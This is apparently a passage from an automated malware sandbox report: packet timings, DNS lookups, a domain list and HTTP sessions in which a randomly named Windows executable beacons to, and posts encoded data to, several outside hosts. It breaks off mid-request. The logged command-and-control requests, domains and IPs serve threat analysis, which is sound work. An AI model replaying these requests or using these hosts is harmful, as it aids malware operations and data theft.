                                                    Aug 5, 2024 15:32:07.352870941 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.352900982 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.352917910 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.353039026 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.353100061 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.353112936 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.353125095 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.354023933 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.354038000 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.823301077 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:07.823385954 CEST5540980192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:08.851334095 CEST5540980192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:08.857403040 CEST80554093.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:09.870322943 CEST5541080192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:09.875477076 CEST80554103.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:09.875547886 CEST5541080192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:09.877701998 CEST5541080192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:09.882636070 CEST80554103.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:11.242788076 CEST80554103.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:11.242818117 CEST80554103.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:11.243024111 CEST5541080192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:11.246021032 CEST5541080192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:11.250933886 CEST80554103.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:16.330894947 CEST5541180192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:16.335854053 CEST8055411109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:16.335983992 CEST5541180192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:16.337836027 CEST5541180192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:16.342859030 CEST8055411109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:16.990628004 CEST8055411109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:16.991204023 CEST8055411109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:16.991395950 CEST5541180192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:17.856082916 CEST5541180192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:18.870798111 CEST5541280192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:18.875874043 CEST8055412109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:18.876010895 CEST5541280192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:18.878891945 CEST5541280192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:18.883873940 CEST8055412109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:19.544770956 CEST8055412109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:19.545957088 CEST8055412109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:19.546017885 CEST5541280192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:20.382889986 CEST5541280192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:21.402117014 CEST5541380192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:21.407110929 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.407213926 CEST5541380192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:21.410698891 CEST5541380192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:21.415961027 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.415982962 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.415996075 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.416009903 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.416044950 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.416163921 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.416229010 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.416243076 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:21.416277885 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:22.070451021 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:22.070595026 CEST8055413109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:22.070909023 CEST5541380192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:22.913929939 CEST5541380192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:23.933454990 CEST5541480192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:23.939755917 CEST8055414109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:23.939856052 CEST5541480192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:23.941818953 CEST5541480192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:23.947274923 CEST8055414109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:24.597884893 CEST8055414109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:24.597929001 CEST8055414109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:24.598270893 CEST5541480192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:24.598339081 CEST8055414109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:24.598476887 CEST5541480192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:24.601211071 CEST5541480192.168.2.4109.95.158.127
                                                    Aug 5, 2024 15:32:24.606039047 CEST8055414109.95.158.127192.168.2.4
                                                    Aug 5, 2024 15:32:29.626846075 CEST5541580192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:29.631808996 CEST80554153.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:29.631892920 CEST5541580192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:29.634285927 CEST5541580192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:29.639238119 CEST80554153.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:30.095812082 CEST80554153.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:30.095906019 CEST5541580192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:31.150125027 CEST5541580192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:31.155754089 CEST80554153.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:32.170186043 CEST5541680192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:32.175267935 CEST80554163.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:32.175360918 CEST5541680192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:32.178124905 CEST5541680192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:32.183070898 CEST80554163.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:32.758655071 CEST80554163.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:32.758755922 CEST5541680192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:33.679502964 CEST5541680192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:33.684381008 CEST80554163.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.701046944 CEST5541780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:34.706032991 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.709495068 CEST5541780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:34.709495068 CEST5541780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:34.714405060 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714420080 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714443922 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714456081 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714550972 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714564085 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714607000 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714618921 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:34.714647055 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:35.190251112 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:35.190409899 CEST5541780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:36.210730076 CEST5541780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:36.215852976 CEST80554173.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:37.229540110 CEST5541880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:37.235394001 CEST80554183.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:37.235661030 CEST5541880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:37.237335920 CEST5541880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:37.244299889 CEST80554183.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:38.673557043 CEST80554183.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:38.674514055 CEST80554183.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:38.674645901 CEST5541880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:38.676399946 CEST5541880192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:32:38.682825089 CEST80554183.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:32:43.700432062 CEST5541980192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:43.706072092 CEST805541964.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:43.706376076 CEST5541980192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:43.708153963 CEST5541980192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:43.713140965 CEST805541964.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:44.347558975 CEST805541964.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:44.347866058 CEST805541964.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:44.348059893 CEST5541980192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:45.211092949 CEST5541980192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:46.230477095 CEST5542080192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:46.235450983 CEST805542064.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:46.235529900 CEST5542080192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:46.237900972 CEST5542080192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:46.242861986 CEST805542064.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:46.883445024 CEST805542064.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:46.883586884 CEST805542064.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:46.883713007 CEST5542080192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:47.741919994 CEST5542080192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:48.762897968 CEST5542180192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:48.767869949 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.767972946 CEST5542180192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:48.770221949 CEST5542180192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:48.779963970 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.779997110 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780064106 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780086040 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780097008 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780107975 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780127048 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780169964 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:48.780179977 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:49.398022890 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:49.398469925 CEST805542164.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:49.398526907 CEST5542180192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:50.273237944 CEST5542180192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:51.293188095 CEST5542280192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:51.298235893 CEST805542264.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:51.298398018 CEST5542280192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:51.302417040 CEST5542280192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:51.312923908 CEST805542264.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:51.922563076 CEST805542264.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:51.923235893 CEST805542264.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:51.923297882 CEST5542280192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:51.925935984 CEST5542280192.168.2.464.226.69.42
                                                    Aug 5, 2024 15:32:51.930840969 CEST805542264.226.69.42192.168.2.4
                                                    Aug 5, 2024 15:32:57.129309893 CEST5542380192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:57.134449005 CEST8055423203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:32:57.135046959 CEST5542380192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:57.138952017 CEST5542380192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:57.144123077 CEST8055423203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:32:57.775000095 CEST8055423203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:32:57.776659012 CEST8055423203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:32:57.776738882 CEST5542380192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:58.650975943 CEST5542380192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:59.669639111 CEST5542480192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:59.674561024 CEST8055424203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:32:59.674633980 CEST5542480192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:59.676848888 CEST5542480192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:32:59.682523966 CEST8055424203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:00.270761967 CEST8055424203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:00.271318913 CEST8055424203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:00.271450996 CEST5542480192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:01.179696083 CEST5542480192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:02.198924065 CEST5542580192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:02.204134941 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.204226971 CEST5542580192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:02.206785917 CEST5542580192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:02.211740971 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.211760998 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.211795092 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.211806059 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.211869955 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.211879015 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.211888075 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.212318897 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.212332010 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.852524996 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.853492022 CEST8055425203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:02.853794098 CEST5542580192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:03.711172104 CEST5542580192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:04.729224920 CEST5542680192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:04.734976053 CEST8055426203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:04.735074997 CEST5542680192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:04.736814976 CEST5542680192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:04.741695881 CEST8055426203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:05.338709116 CEST8055426203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:05.338922024 CEST8055426203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:05.338980913 CEST5542680192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:05.341341019 CEST5542680192.168.2.4203.161.55.102
                                                    Aug 5, 2024 15:33:05.347366095 CEST8055426203.161.55.102192.168.2.4
                                                    Aug 5, 2024 15:33:10.924943924 CEST5542780192.168.2.4216.83.33.140
                                                    Aug 5, 2024 15:33:10.930008888 CEST8055427216.83.33.140192.168.2.4
                                                    Aug 5, 2024 15:33:10.930104971 CEST5542780192.168.2.4216.83.33.140
                                                    Aug 5, 2024 15:33:10.931991100 CEST5542780192.168.2.4216.83.33.140
                                                    Aug 5, 2024 15:33:10.936953068 CEST8055427216.83.33.140192.168.2.4
                                                    Aug 5, 2024 15:33:11.866707087 CEST8055427216.83.33.140192.168.2.4
                                                    Aug 5, 2024 15:33:11.869304895 CEST8055427216.83.33.140192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Aug 5, 2024 15:32:29.624027967 CEST1.1.1.1192.168.2.40x26b6No error (0)alanbeanart.com15.197.148.33A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:43.697736025 CEST1.1.1.1192.168.2.40x55c4No error (0)www.kacotae.com64.226.69.42A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:57.124891043 CEST1.1.1.1192.168.2.40x386aNo error (0)www.slushcafe.top203.161.55.102A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)www.a9jcpf.topkmdne.ajunsdfancsda.comCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.140A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.189A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.143A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.141A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.145A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:25.174489021 CEST1.1.1.1192.168.2.40x878eNo error (0)www.tqfabxah.com35.241.42.217A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.512896061 CEST1.1.1.1192.168.2.40xf78dNo error (0)www.rtrpodcast.onlinertrpodcast.onlineCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.512896061 CEST1.1.1.1192.168.2.40xf78dNo error (0)rtrpodcast.online76.223.67.189A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.512896061 CEST1.1.1.1192.168.2.40xf78dNo error (0)rtrpodcast.online13.248.213.45A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:51.633873940 CEST1.1.1.1192.168.2.40xebfName error (3)www.winkthree.comnonenoneA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:34:00.159919024 CEST1.1.1.1192.168.2.40x5bcaNo error (0)www.mqmsqkw.lol116.213.43.190A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:34:34.651662111 CEST1.1.1.1192.168.2.40x7da9No error (0)www.lfghtko.lol116.213.43.190A (IP address)IN (0x0001)false
• www.stemfiniti.com
• www.zhuan-tou.com
• www.lecoinsa.net
• www.8xbe578.app
• www.synergon.space
• www.alanbeanart.com
• www.kacotae.com
• www.slushcafe.top
• www.a9jcpf.top
• www.tqfabxah.com
• www.rtrpodcast.online
• www.mqmsqkw.lol
• www.lfghtko.lol
Session ID: 0, Source IP: 192.168.2.4, Source Port: 55397, Destination IP: 3.33.130.190, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:16.704848051 CEST, Bytes transferred: 439, Direction: OUT, Data:
GET /toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw= HTTP/1.1
Host: www.stemfiniti.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Timestamp: Aug 5, 2024 15:31:17.205013990 CEST, Bytes transferred: 393, Direction: IN, Data:
HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Aug 2024 13:31:17 GMT
Content-Type: text/html
Content-Length: 253
Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 54 50 3d 75 68 71 70 6a 78 49 50 68 26 65 66 4d 3d 6f 62 4f 4c 39 4a 43 67 4e 78 77 53 34 2b 2b 63 75 4d 64 42 38 6f 4b 79 39 67 48 30 32 6a 32 67 30 73 48 56 5a 6b 79 62 69 68 51 30 46 6f 56 33 35 43 30 4f 46 31 44 52 71 66 4a 68 38 69 69 73 77 54 77 4a 51 55 56 38 37 6d 2b 59 4e 2f 71 6b 4c 62 50 65 5a 6a 44 34 2b 65 6b 65 62 4d 55 6e 44 4d 42 6e 4f 55 56 77 73 6f 7a 7a 63 58 6a 6b 5a 64 77 74 2b 4b 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw="}</script></head></html>


Session ID: 1, Source IP: 192.168.2.4, Source Port: 55399, Destination IP: 38.12.1.29, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:34.455704927 CEST, Bytes transferred: 706, Direction: OUT, Data:
POST /pjmu/ HTTP/1.1
Host: www.zhuan-tou.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.zhuan-tou.com
Referer: http://www.zhuan-tou.com/pjmu/
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 54 72 59 7a 4e 41 32 41 32 31 33 7a 6b 79 64 76 4b 35 73 43 77 5a 4a 65 52 53 6c 66 48 38 59 4b 59 61 48 45 4a 33 39 55 47 4c 31 6a 59 68 30 4e 32 4e 48 42 38 52 5a 77 74 68 2f 4f 73 4b 44 7a 50 4c 71 78 30 72 45 5a 68 38 4e 55 75 39 46 68 6c 66 4b 56 47 36 61 4d 35 79 38 43 67 6c 47 31 39 2f 7a 47 69 4b 6d 41 6c 52 38 57 56 67 2f 2f 42 6f 39 47 37 58 4b 56 6e 4d 59 4b 56 56 56 62 5a 2b 34 34 31 58 72 48 7a 4a 69 57 37 49 69 70 4c 7a 72 61 65 66 2b 54 6f 66 56 72 4c 5a 67 6d 65 56 58 52 43 4a 70 45 55 6f 51 31 65 5a 38 54 30 78 32 59 67 3d 3d
                                                    Data Ascii: efM=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzraef+TofVrLZgmeVXRCJpEUoQ1eZ8T0x2Yg==

Timestamp: Aug 5, 2024 15:31:35.346323013 CEST, Bytes transferred: 691, Direction: IN, Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Aug 2024 13:31:35 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 2, Source IP: 192.168.2.4, Source Port: 55400, Destination IP: 38.12.1.29, Destination Port: 80, PID: 2056, Process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe

Timestamp: Aug 5, 2024 15:31:36.995434046 CEST, Bytes transferred: 726, Direction: OUT, Data:
POST /pjmu/ HTTP/1.1
Host: www.zhuan-tou.com
